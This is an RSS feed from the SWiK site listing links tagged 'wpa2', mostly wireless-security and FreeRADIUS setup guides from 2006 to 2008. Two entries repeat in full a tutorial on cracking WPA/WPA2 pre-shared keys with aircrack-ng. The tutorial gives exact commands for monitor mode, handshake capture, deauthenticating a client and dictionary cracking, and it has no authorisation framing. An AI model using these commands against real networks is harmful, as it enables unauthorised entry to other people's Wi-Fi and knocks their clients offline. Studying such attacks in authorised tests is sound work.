<?xml version="1.0" encoding="UTF-8"?>

<rss version='2.0' 
     xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule"
     xmlns:doap="http://usefulinc.com/ns/doap#"
     xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">

    <channel>
        <!-- This XML Feed shows details for the page wpa2 
             and everything recently tagged wpa2 -->
        <creativeCommons:license>http://creativecommons.org/licenses/by-sa/2.5/
          </creativeCommons:license>
        <title>wpa2 on SWiK</title>
        <doap:name>wpa2</doap:name>
        <doap:description></doap:description>
        <description></description> 
	  <!-- see doap:description for full description -->
        <link>http://swik.net/wpa2</link>
        <doap:homepage></doap:homepage>
        
        <pubDate></pubDate>
        <lastBuildDate></lastBuildDate>
            
        <item>
            <title>Questions about WPA2 and WPA - dslreports.com</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/Questions+about+WPA2+and+WPA+-+dslreports.com/cct3f</link>
            <description></description>
            
            <pubDate>Mon, 18 Aug 2008 13:06:15 -0700</pubDate>
        </item>
            
        <item>
            <title>Securing Your WLAN with WPA and FreeRADIUS, Part III</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/Securing+Your+WLAN+with+WPA+and+FreeRADIUS%2C+Part+III/cajzs</link>
            <description></description>
            
            <pubDate>Wed, 16 Jul 2008 14:48:07 -0700</pubDate>
        </item>
            
        <item>
            <title>SmallNetBuilder - Small Network Help - How To: Setting up FreeRADIUS for WPA &amp; WPA2 Enterprise - Part 1</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/SmallNetBuilder+-+Small+Network+Help+-+How+To%3A+Setting+up+FreeRADIUS+for+WPA+%26+WPA2+Enterprise+-+Part+1/b70z6</link>
            <description></description>
            
            <pubDate>Sat, 21 Jun 2008 22:02:23 -0700</pubDate>
        </item>
            
        <item>
            <title>AirPort Utility 5.1 Help: Konfigurieren eines firmenweiten WPA2-Netzwerks</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/AirPort+Utility+5.1+Help%3A+Konfigurieren+eines+firmenweiten+WPA2-Netzwerks/b5z4k</link>
            <description></description>
            
            <pubDate>Wed, 28 May 2008 09:16:07 -0700</pubDate>
        </item>
            
        <item>
            <title>Crack a WPA/WPA2 Wifi Network using Ubuntu 7.10 (Gutsy)</title>
            <link>http://swik.net/Ubuntu/OnlyUbuntu+Tutorials/Crack+a+WPA%2FWPA2+Wifi+Network+using+Ubuntu+7.10+%28Gutsy%29/b5ibj</link>
            <description>what is the Difference Between cracking a WPA network and WPA2 network,Nothing !! There is no difference between cracking a WPA or WPA2 networks at all.In order to sucessfully crack any WPA/WPA2 network,there are 2 main things must happen&lt;br/&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;br/&gt;&lt;br/&gt;1) U must capture the Full 4 Way Handshake.&lt;br/&gt;&lt;br/&gt;2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce.&lt;br/&gt;&lt;br/&gt;We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.&lt;br/&gt;&lt;br/&gt;There are a few ways to crack a WPA / WPA2 PSK password this is just one of them.&lt;br/&gt;&lt;br/&gt;This method is usally vunerable because of the end user, as most people will use a pass phrase thats easy to remember.&lt;br/&gt;bcz evry body doesnt want to keep long password.&lt;br/&gt;&lt;br/&gt;You will need the following details&lt;br/&gt;&lt;br/&gt;A Client connected to the AP to Deauth&lt;br/&gt;&lt;br/&gt;ESSID = this is the Name of your wireless network i.e MYWIRELESS&lt;br/&gt;BSSID = this is the MAC address of your AP and will be in this format 00:1C:10:26:A9:39 everyone’s is different so make sure &lt;br/&gt;you write it down correctly or the following will not work&lt;br/&gt;&lt;br/&gt;Channel = This will be the channel your AP is Broadcasting on i.e channel 7&lt;br/&gt;&lt;br/&gt;ALSO you will need a decent dictionary file you can find many of these around on the internet google is your friend on this one,then lets start below are the Steps&lt;br/&gt;&lt;br/&gt;Step 1 - Start the wireless interface in monitor mode&lt;br/&gt;&lt;br/&gt;Airmon-ng strat wifi0 (starts ur Interface with Monitor mode)&lt;br/&gt;Airodump-ng ath0 (Monitors the Access point available)&lt;br/&gt;&lt;br/&gt;Step 2 - Start airodump-ng to collect authentication handshake&lt;br/&gt;&lt;br/&gt;Airodump-ng -c 11 -w psk –bssid 00:1C:10:26:A9:39 ath0&lt;br/&gt;&lt;br/&gt;Where:&lt;br/&gt;&lt;br/&gt;-c 11 is the channel for the wireless network&lt;br/&gt;&lt;br/&gt;- -bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminate extraneous traffic.&lt;br/&gt;&lt;br/&gt;-w psk is the file name prefix for the file which will contain the IVs.&lt;br/&gt;&lt;br/&gt;ath0 is the interface name.&lt;br/&gt;&lt;br/&gt;Important: Do NOT use the ”- -ivs” option. You must capture the full packets.&lt;br/&gt;&lt;br/&gt;Step 3 - Use aireplay-ng to deauthenticate the wireless client&lt;br/&gt;&lt;br/&gt;aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0&lt;br/&gt;&lt;br/&gt;Where:&lt;br/&gt;&lt;br/&gt;-0 means deauthentication&lt;br/&gt;&lt;br/&gt;3 is the number of deauths to send (you can send muliple if you wish)&lt;br/&gt;&lt;br/&gt;-a 00:1C:10:26:A9:39 is the MAC address of the access point&lt;br/&gt;&lt;br/&gt;-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing&lt;br/&gt;&lt;br/&gt;ath0 is the interface name&lt;br/&gt;&lt;br/&gt;Step 4 - Run aircrack-ng to crack the pre-shared key&lt;br/&gt;&lt;br/&gt;aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap&lt;br/&gt;&lt;br/&gt;Where:&lt;br/&gt;&lt;br/&gt;-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.&lt;br/&gt;&lt;br/&gt;*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.&lt;br/&gt;&lt;br/&gt;Done now wait for some time It depends upon ur Dictionary file and the passphrase ,&lt;br/&gt;&lt;br/&gt;You should now have your PSK passphrase&lt;br/&gt;&lt;br/&gt;&amp;evilmonkey000&amp;&lt;br/&gt;&lt;/span&gt;&lt;div class=&quot;feedflare&quot;&gt;
&lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=iAhSAH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=iAhSAH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=2fwdWH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=2fwdWH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=RzCiGh&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=RzCiGh&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=ZfgWBh&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=ZfgWBh&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=Nb7iDH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=Nb7iDH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=bgBNGh&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=bgBNGh&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=a6idhH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=a6idhH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=TiCmih&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=TiCmih&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=ezFafH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=ezFafH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            
            <pubDate>Tue, 20 May 2008 10:25:36 -0700</pubDate>
        </item>
            
        <item>
            <title>Crack a WPA/WPA2 Wifi Network using Ubuntu 7.10 (Gutsy)</title>
            <link>http://swik.net/Ubuntu/Only+Ubuntu/Crack+a+WPA%2FWPA2+Wifi+Network+using+Ubuntu+7.10+%28Gutsy%29/b4w3e</link>
            <description>what is the Difference Between cracking a WPA network and WPA2 network,Nothing !! There is no difference between cracking a WPA or WPA2 networks at all.In order to sucessfully crack any WPA/WPA2 network,there are 2 main things must happen&lt;br/&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;br/&gt;&lt;br/&gt;1) U must capture the Full 4 Way Handshake.&lt;br/&gt;&lt;br/&gt;2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce.&lt;br/&gt;&lt;br/&gt;We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.&lt;br/&gt;&lt;br/&gt;There are a few ways to crack a WPA / WPA2 PSK password this is just one of them.&lt;br/&gt;&lt;br/&gt;This method is usally vunerable because of the end user, as most people will use a pass phrase thats easy to remember.&lt;br/&gt;bcz evry body doesnt want to keep long password.&lt;br/&gt;&lt;br/&gt;You will need the following details&lt;br/&gt;&lt;br/&gt;A Client connected to the AP to Deauth&lt;br/&gt;&lt;br/&gt;ESSID = this is the Name of your wireless network i.e MYWIRELESS&lt;br/&gt;BSSID = this is the MAC address of your AP and will be in this format 00:1C:10:26:A9:39 everyone’s is different so make sure &lt;br/&gt;you write it down correctly or the following will not work&lt;br/&gt;&lt;br/&gt;Channel = This will be the channel your AP is Broadcasting on i.e channel 7&lt;br/&gt;&lt;br/&gt;ALSO you will need a decent dictionary file you can find many of these around on the internet google is your friend on this one,then lets start below are the Steps&lt;br/&gt;&lt;br/&gt;Step 1 - Start the wireless interface in monitor mode&lt;br/&gt;&lt;br/&gt;Airmon-ng strat wifi0 (starts ur Interface with Monitor mode)&lt;br/&gt;Airodump-ng ath0 (Monitors the Access point available)&lt;br/&gt;&lt;br/&gt;Step 2 - Start airodump-ng to collect authentication handshake&lt;br/&gt;&lt;br/&gt;Airodump-ng -c 11 -w psk –bssid 00:1C:10:26:A9:39 ath0&lt;br/&gt;&lt;br/&gt;Where:&lt;br/&gt;&lt;br/&gt;-c 11 is the channel for the wireless network&lt;br/&gt;&lt;br/&gt;- -bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminate extraneous traffic.&lt;br/&gt;&lt;br/&gt;-w psk is the file name prefix for the file which will contain the IVs.&lt;br/&gt;&lt;br/&gt;ath0 is the interface name.&lt;br/&gt;&lt;br/&gt;Important: Do NOT use the ”- -ivs” option. You must capture the full packets.&lt;br/&gt;&lt;br/&gt;Step 3 - Use aireplay-ng to deauthenticate the wireless client&lt;br/&gt;&lt;br/&gt;aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0&lt;br/&gt;&lt;br/&gt;Where:&lt;br/&gt;&lt;br/&gt;-0 means deauthentication&lt;br/&gt;&lt;br/&gt;3 is the number of deauths to send (you can send muliple if you wish)&lt;br/&gt;&lt;br/&gt;-a 00:1C:10:26:A9:39 is the MAC address of the access point&lt;br/&gt;&lt;br/&gt;-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing&lt;br/&gt;&lt;br/&gt;ath0 is the interface name&lt;br/&gt;&lt;br/&gt;Step 4 - Run aircrack-ng to crack the pre-shared key&lt;br/&gt;&lt;br/&gt;aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap&lt;br/&gt;&lt;br/&gt;Where:&lt;br/&gt;&lt;br/&gt;-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.&lt;br/&gt;&lt;br/&gt;*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.&lt;br/&gt;&lt;br/&gt;Done now wait for some time It depends upon ur Dictionary file and the passphrase ,&lt;br/&gt;&lt;br/&gt;You should now have your PSK passphrase&lt;br/&gt;&lt;br/&gt;&amp;evilmonkey000&amp;&lt;br/&gt;&lt;/span&gt;&lt;div class=&quot;feedflare&quot;&gt;
&lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=iAhSAH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=iAhSAH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=2fwdWH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=2fwdWH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=RzCiGh&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=RzCiGh&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=ZfgWBh&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=ZfgWBh&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=Nb7iDH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=Nb7iDH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=bgBNGh&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=bgBNGh&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=a6idhH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=a6idhH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=TiCmih&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=TiCmih&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?a=ezFafH&quot;&gt;&lt;img src=&quot;http://feeds.feedburner.com/~f/OnlyUbuntuLinux?i=ezFafH&quot; border=&quot;0&quot;&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            
            <pubDate>Fri, 09 May 2008 00:18:51 -0700</pubDate>
        </item>
            
        <item>
            <title>» Understanding the updated WPA and WPA2 standards | George Ou | ZDNet.com</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/%C2%BB+Understanding+the+updated+WPA+and+WPA2+standards+%7C+George+Ou+%7C+ZDNet.com/batkq</link>
            <description></description>
            
            <pubDate>Mon, 11 Jun 2007 20:33:33 -0700</pubDate>
        </item>
            
        <item>
            <title>HOWTO: Wireless Security - WPA1, WPA2, LEAP, etc. - Ubuntu Forums</title>
            <link>http://swik.net/Kubuntu/del.icio.us%2Ftag%2Fkubuntu/HOWTO%3A+Wireless+Security+-+WPA1%2C+WPA2%2C+LEAP%2C+etc.+-+Ubuntu+Forums/4y81</link>
            <description>Guida in inglese al wirless kubuntu</description>
            
            <pubDate>Fri, 27 Apr 2007 09:33:33 -0700</pubDate>
        </item>
            
        <item>
            <title>» Understanding the updated WPA and WPA2 standards | George Ou | ZDNet.com</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/%C2%BB+Understanding+the+updated+WPA+and+WPA2+standards+%7C+George+Ou+%7C+ZDNet.com/y781</link>
            <description></description>
            
            <pubDate>Tue, 27 Feb 2007 21:14:14 -0800</pubDate>
        </item>
            
        <item>
            <title>HOWTO: Wireless Security - WPA1, WPA2, LEAP, etc. - Ubuntu Forums</title>
            <link>http://swik.net/Kubuntu/del.icio.us%2Ftag%2Fkubuntu/HOWTO%3A+Wireless+Security+-+WPA1%2C+WPA2%2C+LEAP%2C+etc.+-+Ubuntu+Forums/xcly</link>
            <description></description>
            
            <pubDate>Sun, 11 Feb 2007 14:13:27 -0800</pubDate>
        </item>
            
        <item>
            <title>December 2006 Linux Productivity Magazine: Wifi</title>
            <link>http://swik.net/NdisWrapper/del.icio.us+tag%2Fndiswrapper/December+2006+Linux+Productivity+Magazine%3A+Wifi/wao5</link>
            <description>WiFi setup guide for linux. From the Linux Productivity Magazine!</description>
            
            <pubDate>Fri, 02 Feb 2007 10:25:09 -0800</pubDate>
        </item>
            
        <item>
            <title>Gentoo Forums :: View topic - WPA Enterprise w/ FreeRadius [Solved]</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/Gentoo+Forums+%3A%3A+View+topic+-+WPA+Enterprise+w%2F+FreeRadius+%5BSolved%5D/u4xl</link>
            <description></description>
            
            <pubDate>Tue, 23 Jan 2007 18:51:28 -0800</pubDate>
        </item>
            
        <item>
            <title>Linux.com | Create a secure Linux-based wireless access point</title>
            <link>http://swik.net/Kubuntu/del.icio.us%2Ftag%2Fkubuntu/Linux.com+%7C+Create+a+secure+Linux-based+wireless+access+point/t936</link>
            <description></description>
            
            <pubDate>Tue, 16 Jan 2007 05:32:51 -0800</pubDate>
        </item>
            
        <item>
            <title>DD-WRT - Wireless Security</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/DD-WRT+-+Wireless+Security/pvni</link>
            <description></description>
            
            <pubDate>Tue, 21 Nov 2006 20:16:20 -0800</pubDate>
        </item>
            
        <item>
            <title>WPA2-Radius-OSX tutorial</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/WPA2-Radius-OSX+tutorial/ovp8</link>
            <description></description>
            
            <pubDate>Wed, 08 Nov 2006 01:13:54 -0800</pubDate>
        </item>
            
        <item>
            <title>Linux.com | Create a secure Linux-based wireless access point</title>
            <link>http://swik.net/opensource/del.icio.us+tag%2Fopensource/Linux.com+%7C+Create+a+secure+Linux-based+wireless+access+point/hmmx</link>
            <description></description>
            
            <pubDate>Thu, 20 Jul 2006 09:23:36 -0700</pubDate>
        </item>
            
        <item>
            <title>Interview with Chris Hessing, Lead Developer of xsupplicant | Linux Journal</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/Interview+with+Chris+Hessing%2C+Lead+Developer+of+xsupplicant+%7C+Linux+Journal/dwz6</link>
            <description></description>
            
            <pubDate>Sun, 21 May 2006 21:17:38 -0700</pubDate>
        </item>
            
        <item>
            <title>802.1X Port-Based Authentication HOWTO</title>
            <link>http://swik.net/RADIUS/del.icio.us%2Ftag%2Fradius/802.1X+Port-Based+Authentication+HOWTO/b90c</link>
            <description></description>
            
            <pubDate>Sat, 25 Feb 2006 09:07:44 -0800</pubDate>
        </item>
                </channel>
</rss>
